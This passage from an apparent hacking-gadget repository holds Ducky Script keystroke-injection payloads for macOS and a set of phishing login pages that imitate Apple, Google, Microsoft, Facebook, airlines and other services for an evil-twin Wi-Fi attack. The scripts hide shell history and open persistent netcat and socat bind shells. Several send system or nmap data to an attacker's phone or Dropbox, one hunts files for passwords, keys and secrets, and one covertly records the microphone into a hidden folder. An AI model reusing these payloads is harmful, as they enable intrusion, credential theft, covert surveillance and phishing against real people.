HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 21 | DELAY 500 22 | ENTER 23 | DELAY 500 24 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 25 | DELAY 500 26 | ENTER 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING nohup curl -L -o ~/Desktop/ "" & 31 | DELAY 500 32 | ENTER 33 | DELAY 500 34 | ENTER 35 | DELAY 500 36 | GUI w 37 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/GuardianForge.txt: -------------------------------------------------------------------------------- 1 | REM Script for System Execution Testing 2 | REM This script is designed to test system execution capabilities and security settings on macOS. 3 | REM It performs a series of controlled executions to assess the system's behavior and identify any vulnerabilities. 4 | 5 | REM You can replace with th path of your flipper to save the data dump 6 | 7 | 8 | 9 | 10 | REM Author: Narsty 11 | REM Title: GuardianForge 12 | REM Target: MacOS 13 | REM Version: 1.0 14 | REM Category: Recon 15 | 16 | 17 | ID 05ac:021e Apple:Keyboard 18 | DELAY 1000 19 | GUI SPACE 20 | DELAY 500 21 | STRING terminal 22 | DELAY 500 23 | ENTER 24 | DELAY 1000 25 | STRING csrutil status > ~/Desktop/security_info.txt && sleep 2 26 | ENTER 27 | DELAY 2000 28 | STRING spctl --status >> ~/Desktop/security_info.txt && sleep 2 29 | ENTER 30 | DELAY 2000 31 | STRING codesign -dv --verbose=4 /bin/bash >> ~/Desktop/security_info.txt && sleep 2 32 | ENTER 33 | DELAY 2000 34 | STRING ps aux | grep -v "root\|_" >> ~/Desktop/security_info.txt && sleep 2 35 | ENTER 36 | DELAY 2000 37 | STRING lsof -i >> ~/Desktop/security_info.txt && sleep 2 38 | ENTER 39 | 40 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Infinite Reverse Shell.txt: -------------------------------------------------------------------------------- 1 | REM This script installs netcat using home-brew (can adjust delay) 2 | REM Sets up a continuous loop using netcat to establish a connection 3 | REM and execute a bash shell every 180 seconds. 4 | 5 | 6 | REM Now on your separate computer in your terminal Run the command 'nc 53000' 7 | REM replace '' with the IP address of the target computer. 8 | REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out! 9 | REM If the connection is successful, you should now have a remote shell session on the remote computer. 10 | 11 | REM To kill the listening port (53000 in this case) use the command below 12 | REM killall nc 13 | 14 | 15 | REM Requirements: install netcat on both the remote target and your computer 'brew install netcat' 16 | REM Requirements: Remote computer's IP address or hostname 17 | 18 | REM Title: Infinite Reverse Shell.txt 19 | REM Author: NARSTY 20 | REM Target: MacOS 21 | REM Version: 1.0 22 | REM Category: Recon 23 | 24 | 25 | ID 05ac:021e Apple:Keyboard 26 | DELAY 500 27 | GUI SPACE 28 | DELAY 500 29 | STRING terminal 30 | DELAY 1000 31 | ENTER 32 | DELAY 500 33 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 34 | DELAY 500 35 | ENTER 36 | DELAY 500 37 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 38 | DELAY 500 39 | ENTER 40 | DELAY 500 41 | ENTER 42 | DELAY 500 43 | STRING brew install netcat 44 | DELAY 500 45 | ENTER 46 | DELAY 20000 47 | STRING nohup bash -c 'while true; do nc -l -p 53000 -vvv -e /bin/bash; sleep 180; done' & 48 | DELAY 500 49 | ENTER 50 | DELAY 500 51 | CTRL d 52 | DELAY 500 53 | GUI w 54 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Info Infiltrator to Iphone.txt: -------------------------------------------------------------------------------- 1 | REM This script does a Port scan using the targets I.P. 2 | REM then it sends the information from the scan to your phone. 3 | REM Shoutout to matthewkayne and 0iphor13 for the Phone code 4 | 5 | REM Replace "Phone Number HERE" with your phone number to receive MacOs System information 6 | 7 | REM Title: InfoInfiltrator 8 | REM Author: NARSTY 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Recon 12 | 13 | 14 | ID 05ac:021e Apple:Keyboard 15 | DELAY 500 16 | GUI SPACE 17 | DELAY 500 18 | STRING terminal 19 | DELAY 1000 20 | ENTER 21 | DELAY 500 22 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 23 | DELAY 500 24 | ENTER 25 | DELAY 500 26 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | ENTER 31 | DELAY 500 32 | STRING x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' 33 | DELAY 500 34 | ENTER 35 | DELAY 500 36 | ENTER 37 | DELAY 2000 38 | STRING CLEAR 39 | DELAY 500 40 | ENTER 41 | DELAY 500 42 | GUI W 43 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Network Recon Plus.txt: -------------------------------------------------------------------------------- 1 | REM 'networksetup -listallhardwareports' This command lists all the hardware ports/interfaces on your Mac, such as Wi-Fi, Ethernet, Bluetooth, etc. 2 | REM 'ifconfig' This command displays the network interface configuration and status information. 3 | REM ;arp -a' This command shows the Address Resolution Protocol (ARP) cache table. 4 | REM It displays the mappings between IP addresses and MAC addresses of devices on your local network. 5 | 6 | REM Title: Network Recon + 7 | REM Author: Narsty 8 | REM Version: 1.0 9 | REM Target: MacOs 10 | REM Category: Recon 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 500 14 | GUI SPACE 15 | DELAY 500 16 | STRING terminal 17 | DELAY 500 18 | ENTER 19 | DELAY 1000 20 | STRING networksetup -listallhardwareports 21 | ENTER 22 | DELAY 1000 23 | STRING ifconfig 24 | ENTER 25 | DELAY 1000 26 | STRING arp -a 27 | ENTER 28 | 29 | 30 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Network Recon to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM Network Recon and Cloud Sync Automation 2 | REM This script gathers network information from a macOS system 3 | REM then uploads it to Dropbox for easy synchronization and analysis. 4 | REM Replace "" with your actual API access token. line 35 5 | 6 | REM Title: Network Recon to Dropbox 7 | REM Author: Narsty 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: Recon 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 500 15 | GUI SPACE 16 | DELAY 500 17 | STRING terminal 18 | DELAY 1000 19 | ENTER 20 | DELAY 500 21 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 22 | DELAY 500 23 | ENTER 24 | DELAY 500 25 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 26 | DELAY 500 27 | ENTER 28 | DELAY 500 29 | ENTER 30 | DELAY 500 31 | STRING osascript -e 'do shell script "networksetup -listallhardwareports > \"$HOME/Desktop/network_interfaces.txt\" && ipconfig getpacket en0 >> \"$HOME/Desktop/network_interfaces.txt\""' 32 | DELAY 1000 33 | ENTER 34 | DELAY 500 35 | STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/network_interfaces.txt\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"$HOME/Desktop/network_interfaces.txt" 36 | DELAY 2000 37 | ENTER 38 | DELAY 5000 39 | STRING rm -r ~/Desktop/network_interfaces.txt 40 | DELAY 500 41 | ENTER 42 | STRING clear 43 | DELAY 500 44 | ENTER 45 | GUI w 46 | DELAY 500 47 | ENTER 48 | 49 | 50 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Network Reconnaissance.txt: -------------------------------------------------------------------------------- 1 | REM Use responsibly and with proper permissions. 2 | 3 | REM This script initiates a network reconnaissance by scanning for live hosts, 4 | REM performing a port scan on live hosts, 5 | 6 | 7 | REM Author: Narsty 8 | REM Title: Network Reconnaissance 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Recon 12 | 13 | REM Replace (15.151.298.31) with your targets I.P. address 14 | 15 | REM can insert multiple I.p.'s if needed 16 | 17 | 18 | ID 05ac:021e Apple:Keyboard 19 | DELAY 500 20 | GUI SPACE 21 | DELAY 500 22 | STRING terminal 23 | DELAY 500 24 | ENTER 25 | DELAY 1000 26 | STRING echo "Network Reconnaissance:" 27 | STRING && echo "------------------------------" 28 | STRING && echo "Scan Date: $(date)" 29 | STRING && echo "------------------------------" 30 | STRING && echo "Scanning for Live Hosts..." 31 | STRING && echo "------------------------------" 32 | STRING && ping -c 3 15.151.298.31 33 | STRING && ping -c 3 15.151.298.31 34 | REM Add more IP addresses to ping as needed 35 | STRING && echo "------------------------------" 36 | STRING && echo "Performing ARP Scan..." 37 | STRING && echo "------------------------------" 38 | STRING && arp -a 39 | ENTER 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Nmap Scan to Iphone.txt: -------------------------------------------------------------------------------- 1 | REM This script does a Port scan using the targets I.P. 2 | REM then it sends the information from the scan to your phone. 3 | REM Shoutout to matthewkayne and 0iphor13 for the Phone code 4 | 5 | REM Replace "TARGET_IP" with I.P. of Target Mac 6 | REM Replace "Phone Number HERE" with your phone number to receive Network Information 7 | 8 | REM Requirement: NMAP 9 | REM can install using homebrew 'brew install nmap' 10 | 11 | REM Title: Nmap Scan to Iphone 12 | REM Author: NARSTY 13 | REM Target: MacOS 14 | REM Version: 1.0 15 | REM Category: Recon 16 | 17 | 18 | ID 05ac:021e Apple:Keyboard 19 | DELAY 500 20 | GUI SPACE 21 | DELAY 500 22 | STRING terminal 23 | DELAY 1000 24 | ENTER 25 | DELAY 500 26 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 31 | DELAY 500 32 | ENTER 33 | DELAY 500 34 | ENTER 35 | DELAY 500 36 | STRING x=$(nmap -p 1-1000 -T4 -v TARGET_IP); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' 37 | DELAY 500 38 | ENTER 39 | DELAY 500 40 | ENTER 41 | DELAY 2000 42 | GUI W 43 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Public I.P. to Iphone.txt: -------------------------------------------------------------------------------- 1 | REM This script uses Mac Terminals ifconfig.me command to do a PUBLIC I.P. lookup 2 | REM Then sends the I.p. to your phone via text message 3 | REM Replace 'ENTER PHONE NUMBER HERE' with your actual Phone number 4 | REM Shoutout to matthewkayne and 0iphor13 for the Phone code 5 | 6 | 7 | REM Title: Public I.P. to Iphone 8 | REM Author: Narsty 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Recon 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 500 15 | GUI SPACE 16 | DELAY 500 17 | STRING terminal 18 | DELAY 1000 19 | ENTER 20 | DELAY 500 21 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 22 | DELAY 500 23 | ENTER 24 | DELAY 500 25 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 26 | DELAY 500 27 | ENTER 28 | DELAY 500 29 | ENTER 30 | DELAY 500 31 | STRING x=$(curl -s ifconfig.me/ip); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"' 32 | DELAY 500 33 | ENTER 34 | DELAY 4000 35 | STRING CLEAR 36 | DELAY 250 37 | GUI w 38 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/SentinelStrike.txt: -------------------------------------------------------------------------------- 1 | REM macOS Security Testing and Reconnaissance Duckyscript (Local System) 2 | REM Unveiling the Depths of macOS Security 3 | REM Comprehensive Testing and Advanced Reconnaissance Capabilities 4 | REM This Script pulls just about everything you would need to know about a target MAC 5 | 6 | REM Author: Narsty 7 | REM Title: SentinelStrike 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: RECON 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 1000 14 | GUI SPACE 15 | DELAY 500 16 | STRING Terminal 17 | DELAY 500 18 | ENTER 19 | DELAY 500 20 | STRING clear 21 | ENTER 22 | DELAY 500 23 | STRING echo "Starting local system security testing and reconnaissance..." 24 | ENTER 25 | DELAY 1000 26 | 27 | REM Gather System Information 28 | STRING echo "----- System Information -----" 29 | ENTER 30 | STRING system_profiler SPHardwareDataType SPSoftwareDataType | grep -E "Model Identifier|Processor Name|Memory|Serial Number|OS Version" | sed 's/^\s*//' 31 | ENTER 32 | DELAY 1000 33 | 34 | REM Check for Suspicious Processes 35 | STRING echo "----- Suspicious Processes -----" 36 | ENTER 37 | STRING ps aux | grep -E "root|admin" | grep -v grep | awk '{print $2, $11}' 38 | ENTER 39 | DELAY 1000 40 | 41 | REM List Startup Items 42 | STRING echo "----- Startup Items -----" 43 | ENTER 44 | STRING ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents 45 | ENTER 46 | DELAY 1000 47 | 48 | REM Check User Accounts 49 | STRING echo "----- User Accounts -----" 50 | ENTER 51 | STRING dscl . -list /Users | grep -v '_' 52 | ENTER 53 | DELAY 1000 54 | 55 | REM Find Sensitive Files 56 | STRING echo "----- Sensitive Files -----" 57 | ENTER 58 | STRING find ~ -type f \( -iname "*.key" -o -iname "*.pem" -o -iname "*.rsa" \) 2>/dev/null 59 | ENTER 60 | DELAY 1000 61 | 62 | REM Search for Sensitive Information 63 | STRING echo "----- Sensitive Information -----" 64 | ENTER 65 | STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' "password\|username\|apikey\|secret" ~ 2>/dev/null 66 | ENTER 67 | DELAY 1000 68 | 69 | REM Check for Unsecured Files and Directories 70 | STRING echo "----- Unsecured Files and Directories -----" 71 | ENTER 72 | STRING find ~ -type d \( -iname "public" -o -iname "www" \) 2>/dev/null 73 | ENTER 74 | DELAY 1000 75 | 76 | REM Finished 77 | STRING echo "----- Security testing and reconnaissance completed! -----" 78 | ENTER 79 | 80 | 81 | 82 | 83 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/SocatShell.txt: -------------------------------------------------------------------------------- 1 | REM This script sets up a TCP listener using socat for remote shell access. 2 | REM Proceeds to clear the terminal and minimize the window for stealth. 3 | REM It listens on the specified port (6300) 4 | 5 | 6 | REM Once this script is executed there will be an open listener on port 6300 7 | REM you will be able to use the command 'socat STDIN TCP::6300' 8 | REM this will establish a connection to the remote computer on port 6300 9 | REM and you should be able to interact with the remote shell 10 | 11 | REM Requirement: i.p. of target MacOs and socat application 12 | REM can install using homebrew 'brew install socat' 13 | 14 | REM Title: SocatShell 15 | REM Author: NARSTY 16 | REM Target: MacOS 17 | REM Version: 1.0 18 | REM Category: Recon 19 | 20 | 21 | ID 05ac:021e Apple:Keyboard 22 | DELAY 500 23 | GUI SPACE 24 | DELAY 500 25 | STRING terminal 26 | DELAY 1000 27 | ENTER 28 | DELAY 500 29 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 30 | DELAY 500 31 | ENTER 32 | DELAY 500 33 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 34 | DELAY 500 35 | ENTER 36 | ENTER 37 | DELAY 500 38 | STRING nohup socat TCP-LISTEN:6300 EXEC:/bin/bash &>/dev/null & 39 | DELAY 2000 40 | ENTER 41 | DELAY 500 42 | STRING clear 43 | ENTER 44 | DELAY 250 45 | GUI w 46 | 47 | 48 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Voice Logger.txt: -------------------------------------------------------------------------------- 1 | REM Creates a hidden folder named .phantom_audio in the home directory. 2 | REM Writes a Python script (record.py) that uses the sox utility 3 | REM to record audio from the microphone and save it as a .mp3 file. 4 | 5 | REM Once executed, the audio recording will start and continue until manually stopped 6 | REM You can stop the audio recording by finding the PID and using 'kill pid#' 7 | REM The recording is saved in the .phantom_audio directory under the home directory 8 | 9 | REM To access the audio file easily, you can use the following steps: 10 | REM Open a new Finder window. Go to the "Go" menu in the menu bar and select "Go to Folder" 11 | REM enter "~/.phantom_audio" and click the "Go" button. 12 | REM navigate to the .phantom_audio folder where you can find the "Secret audio.mp3" file. 13 | 14 | REM To delete the hidden folder use command 'rm -r ~/.phantom_audio' 15 | 16 | REM Requirements: SOX you can install through homebrew 'brew install sox' 17 | 18 | REM Author: Narsty 19 | REM Title: Phantom Audio Capturer 20 | REM Target: MacOS 21 | REM Version: 1.0 22 | REM Category: Recon 23 | 24 | 25 | ID 05ac:021e Apple:Keyboard 26 | DELAY 500 27 | GUI SPACE 28 | DELAY 500 29 | STRING Terminal 30 | DELAY 1000 31 | ENTER 32 | DELAY 500 33 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 34 | DELAY 500 35 | ENTER 36 | DELAY 500 37 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 38 | DELAY 500 39 | ENTER 40 | DELAY 500 41 | ENTER 42 | DELAY 1000 43 | STRING screen -dm bash -c "nohup python3 record.py &" 44 | DELAY 200 45 | ENTER 46 | DELAY 500 47 | STRING tccutil reset Microphone com.apple.Terminal 48 | DELAY 500 49 | ENTER 50 | STRING mkdir -p ~/.phantom_audio && cd ~/.phantom_audio 51 | DELAY 500 52 | ENTER 53 | DELAY 500 54 | STRING echo 'import os\nimport subprocess\nimport datetime\n\nfilename = "Secret audio.mp3"\ncmd = f"sox -d -C 128 -r 44100 \"{filename}\""\nsubprocess.Popen(cmd, shell=True)' > record.py 55 | DELAY 1000 56 | ENTER 57 | DELAY 500 58 | STRING nohup python3 record.py & 59 | ENTER 60 | DELAY 250 61 | GUI w 62 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/RECON/Web Scraper.txt: -------------------------------------------------------------------------------- 1 | REM Web Scraping and Output to Desktop. 2 | REM This script performs web scraping on a target website and saves the extracted data to a text file on the desktop. 3 | REM Make sure to replace the target website URL and adjust the delay timings as needed for optimal performance. 4 | 5 | 6 | REM Please note that web scraping may have legal and ethical implications, 7 | REM script should only be performed on websites you have permission to access and scrape data from. 8 | REM Replace 'https://www.example.com' with the target website URL. 9 | 10 | 11 | 12 | REM Author: Narsty 13 | REM Title: Web Scraper 14 | REM Version: 1.0 15 | REM Target: MacOs 16 | REM Category: Recon 17 | 18 | 19 | DELAY 500 20 | GUI SPACE 21 | DELAY 500 22 | STRING terminal 23 | DELAY 500 24 | ENTER 25 | DELAY 1000 26 | STRING cd ~/Desktop 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING touch output.txt 31 | DELAY 500 32 | ENTER 33 | DELAY 500 34 | STRING curl -s https://www.example.com > output.txt 35 | DELAY 1000 36 | ENTER 37 | DELAY 500 38 | STRING open -e output.txt 39 | DELAY 1000 40 | ENTER 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Windows/test.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Ducky Script/Windows/test.txt -------------------------------------------------------------------------------- /SD-Card/Frimware/V3.0.1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Frimware/V3.0.1.bin -------------------------------------------------------------------------------- /SD-Card/Frimware/V3.0.2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Frimware/V3.0.2.bin -------------------------------------------------------------------------------- /SD-Card/Frimware/V3.0.3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Frimware/V3.0.3.bin -------------------------------------------------------------------------------- /SD-Card/Frimware/V3.0.4.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Frimware/V3.0.4.bin -------------------------------------------------------------------------------- /SD-Card/HTML/Apple.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Apple ID Login 6 | 7 | 128 | 129 | 130 | 131 |
132 | 137 | 138 |
Use your Apple ID to sign into Wi-Fi
139 | 140 |
141 |
142 | 143 | 144 |
145 | 150 |
151 | 152 | 155 | 158 |
159 |
160 |

© 2023 Apple Inc. All rights reserved.

161 |
162 | 163 | 164 | -------------------------------------------------------------------------------- /SD-Card/HTML/Facebook.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 63 | 64 | 65 | 66 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /SD-Card/HTML/Facebook2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 63 | 64 | 65 | 66 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /SD-Card/HTML/Google_Realistic.html: -------------------------------------------------------------------------------- 1 | Sign in with Google
Sign in
Use your Google Account to access this Free WiFi.
Not your computer? Use Guest mode to sign in privately.
-------------------------------------------------------------------------------- /SD-Card/HTML/JetBlue.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 33 | 34 | 35 |
36 |
37 | 57 |
58 |
59 | 60 | -------------------------------------------------------------------------------- /SD-Card/HTML/Matrix.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 71 | 72 | 73 |
74 |
Register or Sign-in
75 |
76 | 77 | 78 | 79 |
80 |
81 |
82 |
83 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /SD-Card/HTML/Microsoft.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 59 | 60 | 61 |
62 | 69 |
70 |

Sign In with
your Microsoft account

71 | 72 | 73 | 74 |
75 |
76 | 77 | 78 | -------------------------------------------------------------------------------- /SD-Card/HTML/PornHub.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | PornHub Login 5 | 6 | 46 | 47 | 48 |
49 |
50 | 67 |
68 |
69 | 70 | 71 | -------------------------------------------------------------------------------- /SD-Card/HTML/Starlink.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 35 | 36 | 37 |
38 |
39 | 57 |
58 |
59 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /SD-Card/HTML/T_Mobile.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 63 | 64 | 65 | 66 | 67 |
68 | 69 | 70 | 80 | 81 |

Sign in

82 | 83 |

Use your T-Mobile account

84 | 85 |
86 | 87 | 88 | 89 |
90 | 91 |
92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /SD-Card/HTML/Twitch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 55 | 56 | 57 |
58 | 59 |

Welcome

60 | 61 |
62 | 63 | 64 | 65 | 66 | 67 |
68 |
69 | 70 | 71 | -------------------------------------------------------------------------------- /SD-Card/HTML/Twitter.html: -------------------------------------------------------------------------------- 1 | 2 |
3 | -------------------------------------------------------------------------------- /SD-Card/HTML/Twitter_X.html: -------------------------------------------------------------------------------- 1 |
Happening now
Use your twitter account.
-------------------------------------------------------------------------------- /SD-Card/HTML/United_Airlines.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 80 | 81 | 82 |
83 | 84 | 94 | 95 |

Sign in

96 | 97 |

Using your MileagePlus® number and password.

98 | 99 |
100 | 101 |
102 | 103 |
104 | 105 |
106 | 107 |
108 | 109 |
110 | 111 |
112 | 113 |
114 | 115 |
116 | 117 | 118 | -------------------------------------------------------------------------------- /SD-Card/HTML/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | WiFi Password Confirmation 9 | 10 | 11 | 12 | 13 | 14 |
21 | 22 |
23 |
24 |
25 |
26 |

32 | Connection Under Maintenance
33 | Please Confirm Your WiFi Password 34 |

35 | 36 |
37 |

38 | 39 |
40 | 58 | 59 | 75 |
76 |
77 |
78 |
79 |
80 | 81 | 82 | -------------------------------------------------------------------------------- /SD-Card/Pass-Logs/Evil-Twin/test.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Pass-Logs/Evil-Twin/test.txt -------------------------------------------------------------------------------- /SD-Card/Pass-Logs/Wi-Crack/test.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Pass-Logs/Wi-Crack/test.txt -------------------------------------------------------------------------------- /SD-Card/Wi-Crack/test.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackerNowful/HackCat-V3/ca0a5a0cb78c4577e64fed50281641f6b7c035d9/SD-Card/Wi-Crack/test.txt --------------------------------------------------------------------------------